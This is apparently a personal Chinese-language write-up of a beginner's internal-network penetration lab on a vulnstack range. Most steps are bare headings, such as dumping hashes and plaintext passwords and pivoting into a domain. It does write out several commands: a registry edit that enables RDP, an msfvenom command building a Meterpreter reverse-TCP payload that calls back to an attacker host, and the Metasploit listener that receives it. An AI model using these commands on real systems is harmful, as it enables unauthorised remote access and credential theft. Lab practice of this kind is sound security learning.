靶場: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
參考: https://www.anquanke.com/post/id/189940
第一次做關於內網滲透的靶場所以記錄一下,靶場還沒完成(太菜了)。。。。。。
入侵服務器
http://192.168.226.31/yxcms/index.php?r=admin
查看當前權限
查看3389端口是否開啟
開啟3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
添加一個用戶
遠程登錄
內網信息收集
net view /domain
查詢域列表
查詢同域的機器
判斷主域
獲取域控的IP地址
域中其他主機IP地址
查詢域用戶
制作反彈shell
這里請制作32的shell,64為連接不穩定
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.226.30 lport=4444 -f exe -o shell.exe
蟻劍文件上傳
進入msf命令行
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.226.30
lhost => 192.168.226.30
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit
獲取system權限
獲取hash
獲取明文密碼
添加路由表來跨域攻擊
即所有對74網段的攻擊流量都通過已滲透的這台目標主機的meterpreter會話來傳遞
設置代理
看主機3389端口是否開啟
給域成員添加用戶
使用ew制作內網代理
使用代理后的msf攻擊域成員
還有很多地方需要深入了解,努力學習!!!